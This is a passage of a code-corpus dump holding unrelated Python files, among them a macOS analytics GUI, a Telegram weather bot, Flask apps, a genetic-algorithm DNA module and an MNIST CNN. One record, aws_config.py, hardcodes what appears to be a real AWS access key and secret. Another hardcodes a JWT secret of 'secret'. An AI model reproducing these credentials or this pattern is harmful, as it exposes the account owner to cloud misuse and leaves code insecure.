def enterSort_(self, sender):\n if self.sortTextField.stringValue():\n self.sort = self.sortTextField.stringValue()\n self.temp[\"sort\"] = str(self.sort)\n # self.value = 'This metric does not exist'\n else:\n self.sort = \"\"\n self.temp[\"sort\"] = str(self.sort)\n self.updateDisplay()\n\n @objc.IBAction\n def enterFilters_(self, sender):\n if self.filtersTextField.stringValue():\n self.filters = self.filtersTextField.stringValue()\n self.temp[\"filters\"] = str(self.filters)\n # self.value = 'Enter a correct filter'\n else:\n self.filters = \"\"\n self.temp[\"filters\"] = str(self.filters)\n self.updateDisplay()\n\n @objc.IBAction\n def setMaxResults_(self, sender):\n if self.maxResultsTextField.stringValue():\n if int(self.maxResultsTextField.stringValue()) > 0 and int(self.maxResultsTextField.stringValue()) < 1000:\n self.maxResults = int(self.maxResultsTextField.stringValue())\n self.temp[\"maxResults\"] = str(self.maxResults)\n else:\n self.value = 'Choose a number between 1 and 1000'\n self.updateDisplay()\n else:\n self.maxResults = 0\n self.temp[\"maxResults\"] = str(self.maxResults)\n self.updateDisplay()\n\n @objc.IBAction\n def setSpreadsheetID_(self, sender): # RegEx ([a-zA-Z0-9-_]+)\n if self.spreadsheetIdTextField.stringValue():\n self.spreadsheetId = self.spreadsheetIdTextField.stringValue()\n self.temp[\"spreadsheetId\"] = str(self.spreadsheetId)\n # self.value = 'Enter a correct Spreadsheet Id'\n else:\n self.spreadsheetId = \"\"\n self.temp[\"spreadsheetId\"] = str(self.spreadsheetId)\n self.updateDisplay()\n\n @objc.IBAction\n def setSheetName_(self, sender):\n if self.sheetNameTextField.stringValue():\n self.sheetName = self.sheetNameTextField.stringValue()\n self.temp[\"sheetName\"] = str(self.sheetName)\n # self.value = 'This sheet does not exist'\n else:\n self.sheetName = \"\"\n self.temp[\"sheetName\"] = str(self.sheetName)\n self.updateDisplay()\n\n @objc.IBAction\n def setRange_(self, sender):\n if self.rangeTextField.stringValue():\n self.range 
= self.rangeTextField.stringValue()\n self.temp[\"range\"] = str(self.range)\n # self.value = 'Enter a correct range'\n else:\n self.range = \"\"\n self.temp[\"range\"] = str(self.range)\n self.updateDisplay()\n\n @objc.IBAction\n def setSpreadsheetIDStack_(self, sender): # RegEx ([a-zA-Z0-9-_]+)\n if self.spreadsheetIdStackField.stringValue():\n self.spreadsheetIdStack = self.spreadsheetIdStackField.stringValue()\n self.temp[\"spreadsheetIdStack\"] = str(self.spreadsheetIdStack)\n # self.value = 'Enter a correct Spreadsheet Id'\n else:\n self.spreadsheetIdStack = \"\"\n self.temp[\"spreadsheetIdStack\"] = str(self.spreadsheetIdStack)\n self.updateDisplay()\n self.refreshArguments()\n\n @objc.IBAction\n def setSheetNameStack_(self, sender):\n if self.sheetNameStackField.stringValue():\n self.sheetNameStack = self.sheetNameStackField.stringValue()\n self.temp[\"sheetNameStack\"] = str(self.sheetNameStack)\n # self.value = 'This sheet does not exist'\n else:\n self.sheetNameStack = \"\"\n self.temp[\"sheetNameStack\"] = str(self.sheetNameStack)\n self.updateDisplay()\n self.refreshArguments()\n\n @objc.IBAction\n def displayValue_(self, sender):\n if self.viewId != 0 and self.startDate <= self.endDate and self.metrics != '':\n try:\n if int(self.checkBoxSpreadsheetData.state()) == 1:\n self.viewId, self.metrics, self.dimensions, self.sort, self.filters, self.maxResults \\\n = functions.get_data_from_spreadsheet([self.viewId, self.metrics, self.dimensions, self.sort, \\\n self.filters, self.maxResults], self.serviceSheets, self.spreadsheetIdStack, self.sheetNameStack)\n self.value = ''\n viewIds = self.viewId.split(',')\n for viewId in viewIds:\n value = functions.get_value(self.serviceAnalytics, viewId, str(self.startDate), str(self.endDate), self.metrics, self.dimensions, self.sort, self.filters, self.maxResults)\n self.value += functions.str_from_list(value) + '\\n'\n if len(value[0]) == 1:\n value[0].append('')\n value[0].reverse()\n self.values += value\n with open(self.dirpath + 'temp.json', 'w') as f:\n json.dump(self.temp, f, indent=4)\n except (HttpError) as e:\n self.value = json.loads(e.content.decode('utf-8'))['error']['message']\n else:\n if self.viewId == 0:\n self.value = 'You must enter a view ID'\n elif self.startDate > self.endDate:\n self.value = 'Choose a possible date range'\n else:\n self.value = 'You must enter a metric'\n self.updateDisplay()\n\n @objc.IBAction\n def fillSpreadsheet_(self, sender):\n if self.values != [] and self.spreadsheetId != '' and self.sheetName != '' and self.range != '':\n self.temp[\"checkBoxNumericValues\"] = self.checkBoxNumericValues.state()\n if int(self.checkBoxNumericValues.state()) == 1:\n functions.fill_spreadsheet(self.serviceSheets, self.spreadsheetId, self.sheetName, self.range, [[value[1]] for value in self.values])\n else:\n functions.fill_spreadsheet(self.serviceSheets, self.spreadsheetId, self.sheetName, self.range, self.values)\n with open(self.dirpath + 'temp.json', 'w') as f:\n json.dump(self.temp, f, indent=4)\n self.value = \"Done!\"\n else:\n if self.values == []:\n self.value = 'You did not add values for the moment'\n elif self.spreadsheetId == '':\n self.spreadsheetIdTextField.setStringValue_('Spreadsheet ID - Required -')\n self.value = 'You must enter a spreadsheet ID'\n elif self.sheetName == '':\n self.sheetNameTextField.setStringValue_('Sheet name - Required -')\n self.value = 'You must enter a sheet name'\n else:\n self.rangeTextField.setStringValue_('Range (e.g. 
A1:B2) - Required -')\n self.value = 'You must enter a range'\n self.updateDisplay()\n\n @objc.IBAction\n def emptyValues_(self, sender):\n self.values = []\n self.value = 'Previous values have been erased'\n self.updateDisplay()\n\n def updateDisplay(self):\n if self.value.count('\\n') > 64:\n self.valueTextField.setStringValue_('\\n'.join(self.value.split('\\n')[:64])+'\\n and ' + str(self.value.count('\\n')-64) + ' others values...')\n else:\n self.valueTextField.setStringValue_(self.value)\n\n if self.spreadsheetIdStack == '':\n if int(self.checkBoxSpreadsheetData.state()) == 1:\n self.spreadsheetIdStackField.setStringValue_('Spreadsheet ID - Required -')\n else:\n self.spreadsheetIdStackField.setStringValue_('Spreadsheet ID')\n if self.sheetNameStack == '':\n if int(self.checkBoxSpreadsheetData.state()) == 1:\n self.sheetNameStackField.setStringValue_('Sheet name - Required -')\n else:\n self.sheetNameStackField.setStringValue_('Sheet name')\n if self.viewId == 0:\n self.viewIdTextField.setStringValue_('View ID - Required -')\n if self.metrics == '':\n self.metricsTextField.setStringValue_('Metric(s) - Required -')\n if self.dimensions == '':\n self.dimensionsTextField.setStringValue_('Dimension(s)')\n if self.sort == '':\n self.sortTextField.setStringValue_('Sort choices')\n if self.filters == '':\n self.filtersTextField.setStringValue_('Filters')\n if self.maxResults == 0:\n self.maxResultsTextField.setStringValue_('Number max of results')\n if self.spreadsheetId == '':\n self.spreadsheetIdTextField.setStringValue_('Spreadsheet ID')\n if self.sheetName == '':\n self.sheetNameTextField.setStringValue_('Sheet name')\n if self.range == '':\n self.rangeTextField.setStringValue_('Range (e.g. A1:B2)')\n\n def refreshArguments(self):\n self.viewId = self.temp[\"viewId\"]\n self.metrics = self.temp[\"metrics\"]\n self.dimensions = self.temp[\"dimensions\"]\n self.sort = self.temp[\"sort\"]\n self.filters = self.temp[\"filters\"]\n self.maxResults = str(self.temp[\"maxResults\"])\n\nif __name__ == '__main__':\n\n app = NSApplication.sharedApplication()\n\n # Initiate the contrller with a XIB\n viewController = UbermetricsController.alloc().initWithWindowNibName_(\"Ubermetrics\")\n\n # Show the window\n viewController.showWindow_(viewController)\n\n # Bring app to top\n NSApp.activateIgnoringOtherApps_(True)\n\n from PyObjCTools import AppHelper\n AppHelper.runEventLoop()\n","sub_path":"Ubermetrics.py","file_name":"Ubermetrics.py","file_ext":"py","file_size_in_byte":16982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"135962624","text":"# Let's write a program that gets an integer from the user and does not crash when a non-number is entered.\n# 'Copy the code below and modify/add the parts highlighted so that it works and prints the number at the end:\n\nfinished = False\nresult = 0\nwhile not finished:\n try:\n result = int(input(\"Please enter a number\"))\n finished = True\n except ValueError:\n print(\"Please enter a valid integer.\")\nprint(\"Valid result is:\", result)\n","sub_path":"CP1404_Practicals/week_02/exceptions_to_complete.py","file_name":"exceptions_to_complete.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"461942029","text":"list = []\r\nprint('Programma del lanciatore')\r\nprint('Per interrompere il programma digitare nella distanza del lancio -1')\r\nwhile True:\r\n lanci = 0\r\n lanci = lanci + 1\r\n nome = 
input('Nome del lanciatore: ')\r\n lancio = int(input('Distanza del lancio: '))\r\n list.append(lancio)\r\n list.sort()\r\n if lancio == -1:\r\n print('Valore massimo: ', list[lanci])\r\n break\r\n lanci = lanci + 1","sub_path":"es28 02-12-2020.py","file_name":"es28 02-12-2020.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"267419142","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\nfrom heapq import heapify, heappush, heappop\nclass Solution:\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n heap = []\n elementLeft = [True] * len(lists)\n for i, l in enumerate(lists):\n if l != None:\n heap.append((l.val, i))\n else:\n elementLeft[i] = False\n res = ListNode(0) # dummy node\n p = res\n heapify(heap)\n while any(elementLeft):\n val, listind = heappop(heap)\n p.next = lists[listind]\n p = p.next\n lists[listind] = lists[listind].next\n if lists[listind] == None:\n elementLeft[listind] = False\n else:\n heappush(heap, (lists[listind].val, listind))\n return res.next\n","sub_path":"Sort/MergeKLinkedLists.py","file_name":"MergeKLinkedLists.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"467439908","text":"from urllib.parse import unquote\n\nfrom flask import redirect, request, url_for\nfrom flask_api import FlaskAPI\n\nfrom . import models, utils\n\n\napp = FlaskAPI(\"Pomace\")\n\n\n@app.route(\"/\")\ndef index():\n return redirect(\"/sites?url=http://example.com\")\n\n\n@app.route(\"/sites\")\ndef pomace():\n if \"url\" not in request.args:\n return redirect(\"/\")\n\n utils.launch_browser(restore_previous_url=False)\n\n url = request.args.get(\"url\")\n page = models.Page.at(url) # type: ignore\n\n for action, value in request.args.items():\n if \"_\" in action:\n page, _updated = page.perform(action, value, _logger=app.logger)\n\n data = {\n \"id\": page.identity,\n \"url\": page.url,\n \"title\": page.title,\n \"html\": page.html.prettify(),\n \"text\": page.text,\n \"_next\": unquote(url_for(\".pomace\", url=page.url, _external=True)),\n \"_actions\": dir(page),\n }\n\n if not app.debug:\n utils.quit_browser()\n\n return data\n","sub_path":"pomace/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"276880243","text":"__author__ = 'venum'\n\n#This is the config file which is going to hold the values for being able to connect to the AWS Public cloud.\n\n\naws_region = \"us-west-2\"\naws_access_key_id = \"AKIAIEIFSFGXCVJQG23Q\"\naws_secret_access_key = \"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\"\n\naws_ami = 'ami-def297ee'\ninstance_type = 't1.micro'\n\ninstance_map = {}\n","sub_path":"aws_config.py","file_name":"aws_config.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"337118848","text":"def main():\n\n import os\n import sys\n sys.path.append(os.path.dirname(\n os.path.abspath(os.path.dirname(__file__))))\n\n import datetime\n from datetime import timedelta\n\n import time\n import telepot\n from telepot.loop import MessageLoop\n\n from src import hourly_for_telegram\n\n # import loggingmod\n import traceback\n\n def start_msg():\n return 
'''\n지역별 날씨를 예보합니다. 지역을 입력해주세요.\n마침표 하나만 입력해서 이전 지역을 다시 사용할 수 있습니다.\n\n/help 로 도움말을 볼 수 있습니다.\nBot command list:\n/start\n/help\n/command\n/about\n'''\n\n def help_msg():\n return '''\n지역별 날씨를 예보합니다. 지역을 입력해주세요.\n마침표 하나만 입력해서 이전 지역을 다시 사용할 수 있습니다.\n\nBot command list:\n/start\n/help\n/command\n/about\n'''\n\n def about_msg():\n return '''\nHourly Weather Bot\n\n@telnturtle || telnturtle@gmail.com\n'''\n\n def send_msg(bot, chat_id, msg):\n bot.sendMessage(chat_id, msg)\n # loggingmod.logger.info('chat_id: %s\\nGMT : %s\\nKST : %s\\npayload: %s\\n' % (\n # chat_id,\n # datetime.datetime.now().isoformat(' ')[:19],\n # (datetime.datetime.now() + timedelta(hours=9)).isoformat(' ')[:19],\n # msg))\n print('chat_id: %s\\nGMT : %s\\nKST : %s\\npayload: %s\\n' % (\n chat_id,\n datetime.datetime.now().isoformat(' ')[:19],\n (datetime.datetime.now() + timedelta(hours=9)).isoformat(' ')[:19],\n msg))\n\n def handle(msg_):\n content_type, chat_type, chat_id = telepot.glance(msg_)\n time_diff = time.time() - msg_['date']\n time_diff_limit = 60\n text = msg_['text']\n\n if content_type == 'text' and text.startswith('/'):\n if text == '/start':\n send_msg(bot, chat_id, start_msg())\n elif text == '/help':\n send_msg(bot, chat_id, help_msg())\n elif text == '/about':\n send_msg(bot, chat_id, about_msg())\n\n if content_type == 'text' and time_diff_limit > time_diff and not text.startswith('/'):\n\n # 'Sorry, an error occurred. Please try again later.'\n NO_RESULT_MSG = '일치하는 검색결과가 없습니다.'\n payload_list = []\n\n try:\n payload_list = hourly_for_telegram.make_payload(\n chat_id, text, aq=True, daily=True)\n # for weather.com only\n # payload_list[0] = (payload_list[0].replace('Rain', 'Rain☔')\n # .replace('Thunderstorm', 'Thunderstorm⛈')\n # .replace('Cloudy', 'Cloudy☁️')\n # .replace('Clouds', 'Clouds☁️')\n # .replace('Clear', 'Clear☀️')\n # .replace('Overcast', 'Overcast☁️'))\n except Exception as e:\n payload_list.insert(0, NO_RESULT_MSG)\n # loggingmod.logger.error(e, exc_info=True)\n traceback.print_exc()\n\n send_msg(bot, chat_id, payload_list[0])\n for msg_ in payload_list[1:] if payload_list[0] != NO_RESULT_MSG else []:\n send_msg(bot, chat_id, msg_)\n\n with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', 'rsc', '_keys', 'keys'), 'r') as f:\n TOKEN = f.readlines()[9][:-1]\n\n bot = telepot.Bot(TOKEN)\n _count = 5\n while 1:\n try:\n MessageLoop(bot, handle).run_as_thread(allowed_updates='message')\n # loggingmod.logger.info('Listening ...')\n print('Listening ...')\n while 1:\n time.sleep(5)\n except Exception as e:\n # loggingmod.logger.error(e, exc_info=True)\n traceback.print_exc()\n\n _count = _count - 1\n if _count < 1:\n break\n\n # Keep the program running.\n while 1:\n time.sleep(10)\n","sub_path":"src/skeleton.py","file_name":"skeleton.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"366300756","text":"\r\nimport random\r\nimport math\r\nimport csv\r\nimport config\r\nimport numpy as np\r\nimport NeuralNetwork as NN\r\nfrom numba import jit, cuda\r\n\r\ngDnaLength = None\r\n\r\ndef expectedDnaLength(noInput, noHidden, noHiddenLayers, noOutput):\r\n global gDnaLength\r\n # If the DNA length has not been calculated yet. Calculate it. 
Otherwise look it up\r\n if gDnaLength == None:\r\n r1 = noInput + noInput # Input Layer\r\n r2 = noInput * noHidden + (noHidden) # First hidden layer\r\n r3 = (noHiddenLayers - 1) * noHidden * noHidden + ((noHiddenLayers - 1) * noHidden) # Rest of the hidden layers\r\n r4 = noOutput * noHidden + (noOutput) # Output Layer\r\n gDnaLength = r1 + r2 + r3 + r4\r\n return gDnaLength\r\n\r\nclass DNA:\r\n def __init__(self):\r\n self.mutationRate = 0.05\r\n self.crossoverSize = 50\r\n\r\n def extractFromDNA(self, DNA, noInput, noHidden, noHiddenLayers, noOutput):\r\n if config.ENABLE_CHECKS:\r\n requestedLength = expectedDnaLength(noInput, noHidden, noHiddenLayers, noOutput)\r\n assert requestedLength == len(DNA), \"DNA and requested lengths are not equal\"\r\n nxtIndex = 0\r\n\r\n # Input layer\r\n wInput = np.array(DNA[nxtIndex:nxtIndex+noInput])\r\n nxtIndex += noInput\r\n wBiasInput = np.array(DNA[nxtIndex:nxtIndex + noInput])\r\n nxtIndex += noInput\r\n\r\n wHidden = np.zeros(noInput*noHidden+noHidden*(noHiddenLayers-1)*noHidden)\r\n nxtHiddenIndex = 0\r\n wBiasHidden = np.zeros(noHiddenLayers*noHidden)\r\n\r\n # First hidden layer\r\n # wHidden.extend(DNA[nxtIndex:nxtIndex + noInput*noHidden])\r\n wHidden[nxtHiddenIndex:nxtHiddenIndex+noInput * noHidden] = (DNA[nxtIndex:nxtIndex + noInput * noHidden])\r\n nxtIndex += noInput*noHidden\r\n # wBiasHidden.extend(DNA[nxtIndex:nxtIndex + noHidden])\r\n wBiasHidden[nxtHiddenIndex:nxtHiddenIndex + noHidden] = (DNA[nxtIndex:nxtIndex + noHidden])\r\n nxtIndex += noHidden\r\n\r\n # Rest of the hidden layers\r\n for h in range(1,noHiddenLayers):\r\n # wHidden.extend(DNA[nxtIndex:nxtIndex + noHidden*noHidden])\r\n wHidden[nxtHiddenIndex:nxtHiddenIndex + noHidden * noHidden] = (DNA[nxtIndex:nxtIndex + noHidden * noHidden])\r\n nxtIndex += noHidden*noHidden\r\n\r\n # wBiasHidden.extend(DNA[nxtIndex:nxtIndex + noHidden])\r\n wBiasHidden[nxtHiddenIndex:nxtHiddenIndex + noHidden] = (DNA[nxtIndex:nxtIndex + noHidden])\r\n nxtIndex += noHidden\r\n\r\n wOutput = np.array(DNA[nxtIndex:nxtIndex + noHidden*noOutput])\r\n nxtIndex += noHidden*noOutput\r\n\r\n wBiasOutput = np.array(DNA[nxtIndex:nxtIndex + noOutput])\r\n nxtIndex += noOutput\r\n\r\n if config.ENABLE_CHECKS:\r\n buildLength = len(wInput) + len(wBiasInput) + len(wOutput) + len(wBiasOutput)+ len(wHidden) + len(wBiasHidden)\r\n assert buildLength == len(DNA), \"DNA and build lengths are not equal\"\r\n\r\n return wInput, wBiasInput, wHidden, wBiasHidden, wOutput, wBiasOutput\r\n\r\n\r\n def mutateDNA(self, DNA):\r\n return _mutate(DNA, self.mutationRate)\r\n # mutations = math.floor(len(DNA) * self.mutationRate)\r\n # for i in range(0, mutations):\r\n # randId = random.randrange(0,len(DNA))\r\n #\r\n # # Version 1 - Exchange with random weight\r\n # # DNA[randId] = random.random()\r\n #\r\n # # Version 2 - Modify with weight following gaussian distribution\r\n # DNA[randId] += random.gauss(0, 0.08)\r\n # return DNA\r\n\r\n def combineDNA(self, DNA1, DNA2):\r\n # newDNA = DNA1\r\n # for i in range(0, len(DNA1), 10):\r\n # if random.random() < 0.5:\r\n # newDNA[i:i+10] = DNA2[i:i+10]\r\n assert len(DNA1) == len(DNA2), \"The two DNA strings should be the same length\"\r\n newDNA = _crossover(DNA1,DNA2, self.crossoverSize)\r\n assert len(newDNA) == len(DNA1), \"New DNA constructed wrong\"\r\n return newDNA\r\n\r\n def getDNA(self, NN):\r\n wInput = NN.getInputWeights()\r\n wBiasInput = NN.getInputBiasWeights()\r\n wHidden = NN.getHiddenWeights()\r\n wBiasHidden = NN.getHiddenBiasWeights()\r\n wOutput = 
NN.getOutputWeights()\r\n wBiasOutput = NN.getOutputBiasWeights()\r\n return np.concatenate((wInput, wBiasInput, wHidden, wBiasHidden, wOutput, wBiasOutput))\r\n # return wInput + wBiasInput + wHidden + wBiasHidden + wOutput + wBiasOutput\r\n\r\n@jit(nopython=True)\r\ndef _mutate(DNA, mutationRate):\r\n mutations = math.floor(len(DNA) * mutationRate)\r\n for i in range(0, mutations):\r\n randId = random.randrange(0, len(DNA))\r\n DNA[randId] += random.gauss(0, 0.08)\r\n return DNA\r\n\r\n@jit(nopython=True)\r\ndef _crossover(DNA1, DNA2, crossoverSize):\r\n newDNA = DNA1\r\n for i in range(0, len(DNA1), crossoverSize):\r\n if random.random() < 0.5:\r\n newDNA[i:i + crossoverSize] = DNA2[i:i + crossoverSize]\r\n # assert len(newDNA) == len(DNA1), \"New DNA constructed wrong\"\r\n return newDNA\r\n\r\n\r\ndef toStr(DNA):\r\n dnaStr = \"\\n\".join([str(elem) for elem in DNA], )\r\n return dnaStr\r\n\r\ndef fromStr(dnaStr):\r\n reader = csv.reader(dnaStr, delimiter='\\n')\r\n DNA = []\r\n for row in reader:\r\n DNA.append(row[0][0])\r\n return DNA\r\n","sub_path":"Ludo64bitVersion/NeuralNetwork/DNA.py","file_name":"DNA.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"620075493","text":"import jwt\nfrom flask import g\nfrom models import Bucket, Item\nfrom app.authentication.models import User\nfrom api import app, db\n\nJWT_SECRET = 'secret'\nJWT_ALGORITHM = 'HS256'\n\n\ndef verify_token(token):\n user = jwt.decode(token, JWT_SECRET, JWT_ALGORITHM)\n g.user_id = user.get('user_id', '0')\n return user\n\n\ndef create_bucketlist(data, user_id):\n name = data.get('name', None)\n if not name:\n return \"No Name\"\n all_buckets = Bucket.query.filter_by(created_by=user_id).all()\n for bucket_name in all_buckets:\n if bucket_name.name == data['name']:\n return \"Bucket Exists\"\n\n user = User.query.filter_by(id=user_id).first()\n bucket = Bucket(name=name, created_by=user_id).save()\n return bucket\n\n\ndef retrieve_bucketlists(q):\n bucketlist = Bucket.query.filter(Bucket.name.contains(q))\n return bucketlist.filter_by(created_by=g.user_id)\n\n\ndef retrieve_single_bucketlist(id):\n bucket = Bucket.query.filter_by(created_by=g.user_id, id=id).first()\n return bucket\n\n\ndef edit_single_bucketlist(id, data):\n new_name = data.get('name', None)\n bucket = retrieve_single_bucketlist(id)\n bucket.name = new_name\n return bucket.update()\n\n\ndef delete_single_bucketlist(id):\n delete_bucket = Bucket.query.filter_by(id=id, created_by=g.user_id).first()\n if not delete_bucket:\n return \"Bucket not Found\"\n delete_bucket.delete()\n return {}, 204\n\n\ndef create_single_bucketlist_item(id, new_data):\n name = new_data.get('name', None)\n if not name:\n return \"No Name provided\"\n\n queryset = Bucket.query.filter_by(id=id, created_by=g.user_id).first()\n if not queryset:\n return \"Bucketlist Id not valid\"\n new_items = Item(name=name, bucket_id=queryset.id).save()\n return new_items.save(), 200\n\n\ndef edit_single_bucketlist_item(id, item_id, new_data):\n queryset = Item.query.filter_by(id=item_id, bucket_id=id).first()\n if not queryset:\n return \"Bucketlist Id not valid\"\n\n queryset.name = new_data.get('name', queryset.name)\n queryset.done = new_data.get('done', queryset.done)\n queryset = queryset.update()\n return queryset, 200\n\n\ndef delete_single_bucketlist_item(id, item_id):\n queryset = Item.query.filter_by(id=item_id, bucket_id=id).first()\n if not queryset:\n return \"Bucketlist Id not 
valid\"\n queryset.delete()\n return {}, 204\n","sub_path":"app/bucketlist/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"458170971","text":"##########################\r\n# 1. IMPORT LIBRARIES ##\r\n##########################\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\nimport seaborn as sns\r\n\r\n# sklearn\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import confusion_matrix\r\nimport itertools\r\n\r\n# keras\r\nfrom keras.utils.np_utils import to_categorical\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D\r\nfrom keras.optimizers import RMSprop\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.callbacks import ReduceLROnPlateau\r\n\r\n# set seed\r\nnp.random.seed(2)\r\n\r\n###########################\r\n## 2. DATA PREPARATION ##\r\n###########################\r\n# import data\r\ntrain = pd.read_csv(\"C:\\\\Users\\\\joann\\\\OneDrive\\\\Desktop\\\\My Files\\\\Data Science\\\\Digit Recognizer MNIST\\\\train.csv\")\r\ntest = pd.read_csv(\"C:\\\\Users\\\\joann\\\\OneDrive\\\\Desktop\\\\My Files\\\\Data Science\\\\Digit Recognizer MNIST\\\\test.csv\")\r\n\r\nY_train = train[\"label\"]\r\nX_train = train.drop(\"label\", axis=1)\r\n\r\n# quite balanced counts\r\nsns.countplot(Y_train)\r\nY_train.value_counts()\r\n\r\n# check for null and missing values\r\nX_train.isnull().any().describe()\r\ntest.isnull().any().describe()\r\n\r\n# normalize to reduce the effect of illumination's differences. Helps CNN converge faster too\r\nX_train = X_train/255.0\r\ntest = test/255.0\r\n\r\n# reshape image in 3 dimensions 28x28x1 (because 784 total pixel = 28*28)\r\nX_train = X_train.values.reshape(-1, 28, 28, 1)\r\ntest = test.values.reshape(-1, 28, 28, 1)\r\n\r\n# encode labels to one hot vectors (eg: 2 --> [0,0,1,0,0,0,0,0,0,0])\r\nY_train = to_categorical(Y_train, num_classes = 10)\r\n\r\n# check the shape\r\nX_train.shape #(42000, 28, 28, 1)\r\nY_train.shape #(42000, 10)\r\n\r\n###########################\r\n## 3. TRAIN TEST SPLIT ##\r\n###########################\r\nrandom_seed = 2\r\n# stratify to ensure some labels are not over represented in the validation set\r\nX_train, X_val, Y_train, Y_val = train_test_split(X_train, Y_train, test_size=0.1,\r\n stratify = Y_train,\r\n random_state = random_seed)\r\n# image example\r\nplt.imshow(X_train[1][:,:,0]) # 28 x 28\r\n\r\n#######################################\r\n## 4. CONVOLUTIONAL NEURAL NETWORK ##\r\n#######################################\r\n# (Conv2D --> RELU)*2 --> MaxPool2D --> (Dropout)*2 --> Flatten --> Dense --> Dropout --> Out\r\n# Conv2D: each filter transform a part of the image (kernel size) using the kernel filter.\r\n# MaxPool2D: downsampling filter. 
reduce computational cost and to some extent reduce overfitting\r\n# Combining convolutional and pooling layers, CNN are able to combine local features and \r\n# learn more global features of the image.\r\n# Dropout: regularization method, improved generalization and reduces overfitting\r\n# relu: add non-linearity to the network\r\n# flatten layer: convert the final feature maps into 1D vector\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(filters = 32, kernel_size = (5,5), padding = \"Same\",\r\n activation = \"relu\", input_shape = (28, 28, 1))) # channel is 1 because grayscale image\r\nmodel.add(Conv2D(filters = 32, kernel_size = (5,5), padding = \"Same\",\r\n activation = \"relu\"))\r\nmodel.add(MaxPool2D(pool_size=(2,2)))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Conv2D(filters = 64, kernel_size = (3,3), padding = \"Same\",\r\n activation = \"relu\"))\r\nmodel.add(MaxPool2D(pool_size=(2,2), strides=(2,2)))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(256, activation = \"relu\"))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(10, activation = \"softmax\")) # multiclass\r\n\r\n# set optimizer\r\noptimizer = RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)\r\n\r\n# compile the model\r\nmodel.compile(optimizer = optimizer, loss = \"categorical_crossentropy\",\r\n metrics=[\"accuracy\"])\r\n\r\n# setting a learnig rate annealer \r\n# Reduce learning rate when a metric has stopped improving.\r\nlearning_rate_reduction = ReduceLROnPlateau(monitor = \"val_acc\",\r\n patience = 3,\r\n verbose = 1,\r\n factor = 0.5,\r\n min_lr = 0.00001)\r\n\r\nepochs = 30\r\nbatch_size = 86\r\n\r\n# data augmentation\r\n# to avoid overfitting problem, we expand artifically our dataset.\r\ndatagen = ImageDataGenerator(\r\n featurewise_center = False, # set input mean to 0\r\n samplewise_center = False, # set each sample mean to 0\r\n featurewise_std_normalization = False, # divide inputs by std of the dataset\r\n samplewise_std_normalization = False, # divide each input by its std\r\n zca_whitening = False, # a linear algebra operation that reduces the redundancy in the matrix of pixel images.\r\n rotation_range = 10, # randomly rotate images in the range (degrees 0 to 180)\r\n zoom_range = 0.1, # randomly zoom image\r\n width_shift_range = 0.1, # shifts randomly (fraction of total width)\r\n height_shift_range = 0.1, # shifts randomly (fraction of total height)\r\n horizontal_flip = False, # randomly flip images (could misclassify 6 and 9)\r\n vertical_flip = False) # randomly flip images (could misclassify 6 and 9))\r\n\r\ndatagen.fit(X_train)\r\n\r\n# fit the model\r\nhistory = model.fit_generator(datagen.flow(X_train, Y_train, batch_size=batch_size),\r\n epochs = epochs,\r\n validation_data = (X_val, Y_val),\r\n verbose = 2, \r\n steps_per_epoch = X_train.shape[0]//batch_size,\r\n callbacks = [learning_rate_reduction])\r\n\r\n#############################\r\n## 4. 
EVALUATE THE MODEL ##\r\n#############################\r\n# plot the loss and accuracy curves for training and validation\r\nfig, ax = plt.subplots(2,1)\r\nax[0].plot(history.history[\"loss\"], color=\"b\", label=\"Training loss\")\r\nax[0].plot(history.history[\"val_loss\"], color = \"r\", label=\"validation loss\", axes=ax[0])\r\nlegend = ax[0].legend(loc=\"best\", shadow=True)\r\n\r\nax[1].plot(history.history[\"acc\"], color=\"b\", label=\"Training accuracy\")\r\nax[1].plot(history.history[\"val_acc\"], color=\"r\", label=\"Validation accuracy\")\r\nlegend = ax[1].legend(loc=\"best\", shadow=True)\r\n\r\n# confusion matrix\r\ndef plot_confusion_matrix(cm, classes,\r\n normalize = False, # set to true if want normalized\r\n title = \"Confusion Matrix\",\r\n cmap = plt.cm.Blues):\r\n plt.figure(figsize=(8,8))\r\n plt.imshow(cm, interpolation=\"nearest\", cmap=cmap)\r\n plt.title(title)\r\n plt.colorbar()\r\n tick_marks = np.arange(len(classes))\r\n plt.xticks(tick_marks, classes, rotation=45)\r\n plt.yticks(tick_marks, classes)\r\n \r\n if normalize:\r\n cm = cm.astype(\"float\")/ cm.sum(axis=1)[:, np.newaxis]\r\n \r\n thresh = 